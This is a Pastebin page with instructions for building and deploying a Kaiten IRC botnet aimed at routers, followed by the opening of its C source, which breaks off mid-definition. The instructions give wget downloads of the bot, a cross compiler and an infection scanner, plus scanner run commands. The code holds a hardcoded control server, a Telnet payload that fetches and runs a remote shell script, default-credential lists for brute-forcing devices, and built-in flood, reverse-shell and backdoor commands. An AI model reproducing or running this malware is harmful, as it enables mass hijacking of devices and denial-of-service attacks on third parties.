Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- qbot and mirai sucked, so here's kaiten v 6.6.6 will infect jillions of routers.
- To setup kaiten, follow the instructions
- Every line starting with a "-" is a command you enter in terminal
- Download kaiten.c from http://pastebin.com/7Spas23P
- -wget http://pastebin.com/raw/7Spas23P -O kaiten.c
- Next edit the file and change the settings to your IRC server, channel, and channel key.
- -nano kaiten.c
- scanner and bot modified by SynthMesc/Freak :D
- kaiten.c (I didn't create kaiten)
- Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
- Use this cross compiler (coded by yours truly): http://pastebin.com/87q15NWF
- -wget http://pastebin.com/raw/87q15NWF -O cc7.py
- -python cc7.py kaiten.c 0.0.0.0
- Where 0.0.0.0 is your servers IP
- Put the files in your htdocs or html directory of a server to host them.
- Next download the scanner
- -wget http://pastebin.com/raw/wTbbzSBV -O infect.py
- Remember to edit the wget line in the scanner (CTRL + F "bin.sh")
- Next install the dependencies
- -yum install python-paramiko
- Or
- -apt-get install python-paramiko
- Set some stuff on your servers so you don't get capped at 476 open SSH connections.
- -ulimit -n 99999
- -sysctl -w fs.file-max=100000
- Run heavyhidra
- -python infect.py 376 LUCKY x 0
- -python infect.py 376 B 113.53 1
- -python infect.py 376 ALL x lol
- Donate BTC: 1GbiMJNg9VLcMQp3eTdZo4URxE8X4Je7wJ/*******************************************************************************
- * This is a remake of Kaiten, hacked together from various versions scattered *
- * throughout cyberspace. New features include a variety of awesome shell one- *
- * liners, ability to upgrade the bot over http (via gcc or static binary), a *
- * feature called "HackPkg" that installs binaries without dependencies like *
- * wget or tftp, and more! Tip: run GETBB <tftp ip> first to get the most out *
- * of this bot (it will install to /var/bin, which is almost always writable). *
- * The LOCKUP command will kill telnetd and run a backdoor of your choice (for *
- * simplicity we assume you will run it on port 23). This bot is updated often,*
- * so check back frequently for new killer features and ddos tools. In memory *
- * of David Bowie, because he was an awesome musician and passed during the *
- * early development of this bot. By ShellzRuS and all the other developers *
- * that have worked on Kaiten over the last 20 years. *
- * *
- * "Hacking on kaiten is a right of passage" --Kod *
- *******************************************************************************
- * This is a IRC based distributed denial of service client. It connects to *
- * the server specified below and accepts commands via the channel specified. *
- * The syntax is: *
- * !<nick> <command> *
- * You send this message to the channel that is defined later in this code. *
- * Where <nick> is the nickname of the client (which can include wildcards) *
- * and the command is the command that should be sent. For example, if you *
- * want to tell all the clients with the nickname starting with N, to send you *
- * the help message, you type in the channel: *
- * !N* HELP *
- * That will send you a list of all the commands. You can also specify an *
- * astrick alone to make all client do a specific command: *
- * !* SH uname -a *
- * There are a number of commands that can be sent to the client: *
- * PAN <target> <port> <secs> = A SYN flooder *
- * TCP <target> <port> <time> <flags> <packetsize> <pollinterval> = A spoofed TCP flooder
- * STD <ip> <port> <time>. = A STD flooder *
- * UDP <target> <port> <secs> = An UDP flooder *
- * UNKNOWN <target> <secs> = Another non-spoof udp flooder *
- * HTTPFLOOD <url> <secs> = A HTTP flooder *
- * NTP <target> <ntp server> <secs> = an NTP dos flooder *
- * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls
- * DNSAMP <IP> <port> <reflection file url> <threads> <time> = DNS amplification flooder
- * QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A quake3 amplification flooder
- *
- * PROXYFLUX = Starts a TCP proxy tunnel to main server using netcat
- *
- * NICK <nick> = Changes the nick of the client *
- * SERVER <server> = Changes servers *
- * GETSPOOFS = Gets the current spoofing *
- * SPOOFS <subnet> = Changes spoofing to a subnet *
- * DISABLE = Disables all packeting from this bot *
- * ENABLE = Enables all packeting from this bot *
- * KILL = Kills the knight *
- * GET <http address> <save as> = Downloads a file off the web *
- * VERSION = Requests version of knight *
- * KILLALL = Kills all current packeting *
- * HELP = Displays this *
- * IRC <command> = Sends this command to the server *
- * SH <command> = Executes a command *
- * BASH <command> = Run a bash command *
- * ISH <command> = Interactive SH (via privmsg) *
- * SHD <command> = Daemonize command *
- * UPDATE <http://server/bot> = Update this bot *
- * HACKPKG <http://server/bin> = Install binary (no dependencies) *
- * INSTALL <http://server/bin> = Install binary (via wget) *
- * BINUPDATE <http://server/bin> = Update a binary (via wget) *
- * SCAN <nmap opts> = Call an nmap wrapper script *
- * GETSSH <http:serverdropbear> = Install dropbear, run on port 30022 *
- * RSHELL <ip port> = Equates to nohup nc ip port *
- * GETBB <tftp server> = Get a proper busybox (via tftp) *
- * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
- * *
- * Remember, all these commands must be prefixed by a ! and the nickname that *
- * you want the command to be sent to (can include wildcards). There are no *
- * spaces in between the ! and the nickname, and there are no spaces before *
- * the ! *
- * *
- * - contem on efnet - Shellz&Kod&Freak/SynthMesc *
- *******************************************************************************/
- ////////////////////////////////////////////////////////////////////////////////
- // EDIT THESE //
- ////////////////////////////////////////////////////////////////////////////////
- #undef STARTUP // Start on startup?
- #undef IDENT // Only enable this if you absolutely have to
- #define FAKENAME "-bash" // What you want this to hide as
- #define CHAN "#tac0b3ll" // Channel to join
- #define KEY "swigityswag" // The key of the channel
- #define PREFIX "NiXnEt" // The NICK prefix
- #define SERVER_ADDR "64.137.205.150" //Fast-flux server address
- #define PROXY_PORT "6667" //Proxy port for fast-flux
- int numservers=1; // Must change this to equal number of servers down there
- char *servers[] = { // List the servers in that format, always end in (void*)0
- "update-server.dynu.net",
- (void*)0
- };
- ////////////////////////////////////////////////////////////////////////////////
- // STOP HERE! //
- ////////////////////////////////////////////////////////////////////////////////
- #include <stdarg.h>
- #include <errno.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <strings.h>
- #include <netinet/in.h>
- #include <unistd.h>
- #include <sys/time.h>
- #include <sys/socket.h>
- #include <signal.h>
- #include <arpa/inet.h>
- #include <netdb.h>
- #include <time.h>
- #include <sys/wait.h>
- #include <sys/ioctl.h>
- #include <poll.h>
- #include <stdint.h>
- #include <pthread.h>
- #include <netinet/ip.h>
- #include <netinet/udp.h>
- #include <dirent.h>
- #include <net/if.h>
- #define MAX_PACKET_SIZE 8192
- #define PHI 0x9e3779b9
- #define PACKETS_PER_RESOLVER 25
- #define CMD_IAC 255
- #define CMD_WILL 251
- #define CMD_WONT 252
- #define CMD_DO 253
- #define CMD_DONT 254
- #define PAD_RIGHT 1
- #define PAD_ZERO 2
- #define PRINT_BUF_LEN 12
- #define OPT_SGA 3
- #define SOCKBUF_SIZE 1024
- #define NUMITEMS(x) (sizeof(x) / sizeof((x)[0]))
- char *Telnet_Payload = "cd /tmp; rm *; wget http://browsersecurity.gq/update/bins.sh; chmod +x bins.sh; sh bins.sh; rm -f bins.sh\r\n\0";
- char *Bot_Killer_Binarys[] = {
- "mips",
- "mips64",
- "mipsel",
- "sh2eb",
- "sh2elf",
- "sh4",
- "x86",
- "arm",
- "armv5",
- "armv4tl",
- "armv4",
- "armv6",
- "i686",
- "powerpc",
- "powerpc440fp",
- "i586",
- "m68k",
- "sparc",
- "x86_64",
- "jackmymips",
- "jackmymips64",
- "jackmymipsel",
- "jackmysh2eb",
- "jackmysh2elf",
- "jackmysh4",
- "jackmyx86",
- "jackmyarmv5",
- "jackmyarmv4tl",
- "jackmyarmv4",
- "jackmyarmv6",
- "jackmyi686",
- "jackmypowerpc",
- "jackmypowerpc440fp",
- "jackmyi586",
- "jackmym68k",
- "jackmysparc",
- "jackmyx86_64",
- "hackmymips",
- "hackmymips64",
- "hackmymipsel",
- "hackmysh2eb",
- "hackmysh2elf",
- "hackmysh4",
- "hackmyx86",
- "hackmyarmv5",
- "hackmyarmv4tl",
- "hackmyarmv4",
- "hackmyarmv6",
- "hackmyi686",
- "hackmypowerpc",
- "hackmypowerpc440fp",
- "hackmyi586",
- "hackmym68k",
- "hackmysparc",
- "hackmyx86_64",
- "b1",
- "b2",
- "b3",
- "b4",
- "b5",
- "b6",
- "b7",
- "b8",
- "b9",
- "b10",
- "b11",
- "b12",
- "b13",
- "b14",
- "b15",
- "b16",
- "b17",
- "b18",
- "b19",
- "b20",
- "busyboxterrorist",
- "DFhxdhdf",
- "dvrHelper",
- "FDFDHFC",
- "FEUB",
- "FTUdftui",
- "GHfjfgvj",
- "jhUOH",
- "JIPJIPJj",
- "JIPJuipjh",
- "kmymips",
- "kmymips64",
- "kmymipsel",
- "kmysh2eb",
- "kmysh2elf",
- "kmysh4",
- "kmyx86",
- "kmyarmv5",
- "kmyarmv4tl",
- "kmyarmv4",
- "kmyarmv6",
- "kmyi686",
- "kmypowerpc",
- "kmypowerpc440fp",
- "kmyi586",
- "kmym68k",
- "kmysparc",
- "kmyx86_64",
- "lolmips",
- "lolmips64",
- "lolmipsel",
- "lolsh2eb",
- "lolsh2elf",
- "lolsh4",
- "lolx86",
- "lolarmv5",
- "lolarmv4tl",
- "lolarmv4",
- "lolarmv6",
- "loli686",
- "lolpowerpc",
- "lolpowerpc440fp",
- "loli586",
- "lolm68k",
- "lolsparc",
- "RYrydry",
- "telmips",
- "telmips64",
- "telmipsel",
- "telsh2eb",
- "telsh2elf",
- "telsh4",
- "telx86",
- "telarmv5",
- "telarmv4tl",
- "telarmv4",
- "telarmv6",
- "teli686",
- "telpowerpc",
- "telpowerpc440fp",
- "teli586",
- "telm68k",
- "telsparc",
- "telx86_64",
- "TwoFacemips",
- "TwoFacemips64",
- "TwoFacemipsel",
- "TwoFacesh2eb",
- "TwoFacesh2elf",
- "TwoFacesh4",
- "TwoFacex86",
- "TwoFacearmv5",
- "TwoFacearmv4tl",
- "TwoFacearmv4",
- "TwoFacearmv6",
- "TwoFacei686",
- "TwoFacepowerpc",
- "TwoFacepowerpc440fp",
- "TwoFacei586",
- "TwoFacem68k",
- "TwoFacesparc",
- "TwoFacex86_64",
- "UYyuyioy",
- "x86_64",
- "XDzdfxzf",
- "xxb1",
- "xxb2",
- "xxb3",
- "xxb4",
- "xxb5",
- "xxb6",
- "xxb7",
- "xxb8",
- "xxb9",
- "xxb10",
- "xxb11",
- "xxb12",
- "xxb13",
- "xxb14",
- "xxb15",
- "xxb16",
- "xxb17",
- "xxb18",
- "xxb19",
- "xxb20",
- "1",
- "2",
- "3",
- "4",
- "5",
- "6",
- "7",
- "8",
- "9",
- "10",
- "11",
- "12",
- "13",
- "14",
- "15",
- "16",
- "17",
- "18",
- "19",
- "20",
- "bb",
- "busybotnet",
- "pppd",
- "pppoe",
- "wput",
- "B1",
- "B2",
- "B3",
- "B4",
- "B5",
- "B6",
- "B7",
- "B8",
- "B9",
- "B10",
- "B11",
- "B12",
- "B13",
- "B14",
- "B15",
- "B16",
- "B17",
- "B18",
- "B20"
- };
- char *useragents[] = {
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
- "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
- "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
- "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
- "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
- "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
- "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
- "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
- "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
- "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
- "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
- "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
- "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
- "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
- "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
- };
- char *Telnet_Usernames[] = {
- "telnet\0", //telnet:telnet
- "root\0", //root:root
- "admin\0", //admin:toor
- "user\0", //user:admin
- "login\0", //login:user
- "guest\0", //guest:guest
- "support\0" //support:login
- "root\0", //root:netgear1
- "root\0", //root:maxided
- "CISCO\0", //CISCO:CISCO
- "oracle\0", //oracle:oracle
- "tim\0", //tim:tim
- };
- char *Telnet_Passwords[] = {
- "telnet\0", //telnet:telnet
- "root\0", //root:root
- "toor\0", //admin:toor
- "admin\0", //user:admin
- "user\0", //login:user
- "guest\0", //guest:guest
- "login\0", //support:login
- "changeme\0", //(none):changeme
- "1234\0", //(none):1234
- "12345\0", //(none):12345
- "123456\0", //(none):123456
- "default\0", //(none):default
- "pass\0", //(none):pass
- "password\0", //(none):password
- "support\0", //(none):support
- "\0" //(none):(none)
- "maxided\0" //root:maxided
- "oracle\0", //oracle:oracle
- "tim\0", //tim:tim
- };
- char* advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", (char*)0};
- char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
- char* successes[] = {"busybox", "$", "#", "shell", "dvrdvs", (char*)0};
- char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
- struct telstate_t {
- int fd;
- unsigned int ip;
- unsigned char state;
- unsigned char complete;
- unsigned char usernameInd; /* username */
- unsigned char passwordInd; /* password */
- unsigned char tempDirInd; /* tempdir */
- unsigned int tTimeout; /* totalTimeout */
- unsigned short bufUsed;
- char *sockbuf;
- };
- extern int scanPid = 0;
- int sock,changeservers=0;
- int *pids, csum=0, actualparent;
- char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
- //unsigned int *pids;
- unsigned long spoofs=0, spoofsm=0, numpids=0;
- char *getBuild() { //get architecture
- #if defined(__x86_64__) || defined(_M_X64)
- return "x86_64";
- #elif defined(__i386) || defined(_M_IX86)
- return "x86_32";
- #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
- return "ARM-4";
- #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
- return "ARM-5"
- #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
- return "ARM-6";
- #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
- return "MIPS";
- #elif defined(__sh__)
- return "SUPERH";
- #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
- return "POWERPC";
- #else
- return "UNKNOWN";
- #endif
- }
- // Calculates the checksum of the ip header.
- unsigned short ccsum(unsigned short *ptr,int nbytes)
- {
- register long sum;
- unsigned short oddbyte;
- register short answer;
- sum=0;
- while(nbytes>1) {
- sum+=*ptr++;
- nbytes-=2;
- }
- if(nbytes==1) {
- oddbyte=0;
- *((u_char*)&oddbyte)=*(u_char*)ptr;
- sum+=oddbyte;
- }
- sum = (sum>>16)+(sum & 0xffff);
- sum = sum + (sum>>16);
- answer=(short)~sum;
- return(answer);
- }
- int strwildmatch(const char* pattern, const char* string) {
- switch(*pattern) {
- case '\0': return *string;
- case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
- case '?': return !(*string && !strwildmatch(pattern+1, string+1));
- default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
- }
- }
- int Send(int sock, char *words, ...) {
- static char textBuffer[1024];
- va_list args;
- va_start(args, words);
- vsprintf(textBuffer, words, args);
- va_end(args);
- return write(sock,textBuffer,strlen(textBuffer));
- }
- int mfork(char *sender) {
- unsigned int parent, *newpids, i;
- if (disabled == 1) {
- Send(sock, "NOTICE %s :Unable to comply.\n", sender);
- return 1;
- }
- parent=fork();
- if (parent <= 0) return parent;
- numpids++;
- newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
- for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
- newpids[numpids-1]=parent;
- free(pids);
- pids=newpids;
- return parent;
- }
- unsigned long getspoof() {
- if (!spoofs) return rand();
- if (spoofsm == 1) return ntohl(spoofs);
- return ntohl(spoofs+(rand() % spoofsm)+1);
- }
- void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
- char *randstring(int length) {
- srand(time(NULL));
- char *charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
- size_t stringLen = 26*2+10+7;
- char *randomString;
- randomString = malloc(sizeof(char) * (length +1));
- if (!randomString) {
- return (char*)0;
- }
- unsigned int key = 0;
- for (int n = 0;n < length;n++) {
- key = rand() % stringLen;
- randomString[n] = charset[key];
- }
- randomString[length] = '\0';
- return randomString;
- }
- void identd() {
- int sockname,sockfd,sin_size,tmpsock,i;
- struct sockaddr_in my_addr,their_addr;
- char szBuffer[1024];
- if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons(113);
- my_addr.sin_addr.s_addr = INADDR_ANY;
- memset(&(my_addr.sin_zero), 0, 8);
- if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
- if (listen(sockfd, 1) == -1) return;
- if (fork() == 0) return;
- sin_size = sizeof(struct sockaddr_in);
- if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
- for(;;) {
- fd_set bla;
- struct timeval timee;
- FD_ZERO(&bla);
- FD_SET(tmpsock,&bla);
- timee.tv_sec=timee.tv_usec=60;
- if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
- if (FD_ISSET(tmpsock,&bla)) break;
- }
- i = recv(tmpsock,szBuffer,1024,0);
- if (i <= 0 || i >= 20) exit(0);
- szBuffer[i]=0;
- if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
- if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
- Send(tmpsock, "%s : USERID : UNIX : %s\n",szBuffer,ident);
- close(tmpsock);
- close(sockfd);
- exit(0);
- }
- long pow(long a, long b) {
- if (b == 0) return 1;
- if (b == 1) return a;
- return a*pow(a,b-1);
- }
- u_short in_cksum(u_short *addr, int len) {
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer =0;
- while (nleft > 1) {
- sum += *w++;
- nleft -= 2;
- }
- if (nleft == 1) {
- *(u_char *)(&answer) = *(u_char *)w;
- sum += answer;
- }
- sum = (sum >> 16) + (sum & 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
- void get(int sock, char *sender, int argc, char **argv) {
- int sock2,i,d;
- struct sockaddr_in server;
- unsigned long ipaddr;
- char buf[1024];
- FILE *file;
- unsigned char bufm[4096];
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :GET <host> <save as>\n", sender);
- exit(0);
- }
- if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
- exit(0);
- }
- if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
- else strcpy(buf,argv[1]);
- for (i=0;i<strlen(buf) && buf[i] != '/';i++);
- buf[i]=0;
- server.sin_family = AF_INET;
- server.sin_port = htons(80);
- if ((ipaddr = inet_addr(buf)) == -1) {
- struct hostent *hostm;
- if ((hostm=gethostbyname(buf)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
- exit(0);
- }
- memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
- }
- else server.sin_addr.s_addr = ipaddr;
- memset(&(server.sin_zero), 0, 8);
- if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
- Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
- exit(0);
- }
- Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
- Send(sock, "NOTICE %s :Receiving file.\n", sender);
- file=fopen(argv[2],"wb");
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done;
- }
- }
- done:
- Send(sock, "NOTICE %s :Saved as %s\n", sender,argv[2]);
- while(1) {
- int i,d;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- close(sock2);
- exit(0);
- }
- void getspoofs(int sock, char *sender, int argc, char **argv) {
- unsigned long a=spoofs,b=spoofs+(spoofsm-1);
- if (spoofsm == 1) Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
- else Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
- }
- void version(int sock, char *sender, int argc, char **argv) {
- Send(sock, "NOTICE %s :Kaiten Ziggy Redo by Freak version 4.20", sender);
- }
- void nickc(int sock, char *sender, int argc, char **argv) {
- if (argc != 1) {
- Send(sock, "NOTICE %s :NICK <nick>\n", sender);
- return;
- }
- if (strlen(argv[1]) >= 10) {
- Send(sock, "NOTICE %s :Nick cannot be larger than 9 characters.\n", sender);
- return;
- }
- Send(sock, "NICK %s\n",argv[1]);
- }
- void disable(int sock, char *sender, int argc, char **argv) {
- if (argc != 1) {
- Send(sock, "NOTICE %s :DISABLE <pass>\n", sender);
- Send(sock, "NOTICE %s :Current status is: %s.\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
- return;
- }
- if (disabled) {
- Send(sock, "NOTICE %s :Already disabled.\n", sender);
- return;
- }
- if (strlen(argv[1]) > 254) {
- Send(sock, "NOTICE %s :Password too long! > 254\n", sender);
- return;
- }
- disabled=1;
- memset(dispass,0,256);
- strcpy(dispass,argv[1]);
- Send(sock, "NOTICE %s :Disable sucessful.\n");
- }
- void enable(int sock, char *sender, int argc, char **argv) {
- if (argc != 1) {
- Send(sock, "NOTICE %s :ENABLE <pass>\n", sender);
- Send(sock, "NOTICE %s :Current status is: %s.\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
- return;
- }
- if (!disabled) {
- Send(sock, "NOTICE %s :Already enabled.\n", sender);
- return;
- }
- if (strcasecmp(dispass,argv[1])) {
- Send(sock, "NOTICE %s :Wrong password\n", sender);
- return;
- }
- disabled=0;
- Send(sock, "NOTICE %s :Password correct.\n", sender);
- }
- void spoof(int sock, char *sender, int argc, char **argv) {
- char ip[256];
- int i, num;
- unsigned long uip;
- if (argc != 1) {
- Send(sock, "NOTICE %s :Removed all spoofs\n", sender);
- spoofs=0;
- spoofsm=0;
- return;
- }
- if (strlen(argv[1]) > 16) {
- Send(sock, "NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n", sender);
- return;
- }
- strcpy(ip,argv[1]);
- if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
- for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
- num=-(num-4);
- for (i=0;i<num;i++) strcat(ip,".0");
- uip=inet_network(ip);
- if (num == 0) spoofsm=1;
- else spoofsm=pow(256,num);
- spoofs=uip;
- }
- /*struct iphdr {
- unsigned int ihl:4, version:4;
- unsigned char tos;
- unsigned short tot_len;
- unsigned short id;
- unsigned short frag_off;
- unsigned char ttl;
- unsigned char protocol;
- unsigned short check;
- unsigned long saddr;
- unsigned long daddr;
- };*/
- /*struct udphdr {
- unsigned short source;
- unsigned short dest;
- unsigned short len;
- unsigned short check;
- };*/
- struct tcphdr {
- unsigned short source;
- unsigned short dest;
- unsigned long seq;
- unsigned long ack_seq;
- unsigned short res1:4, doff:4;
- unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
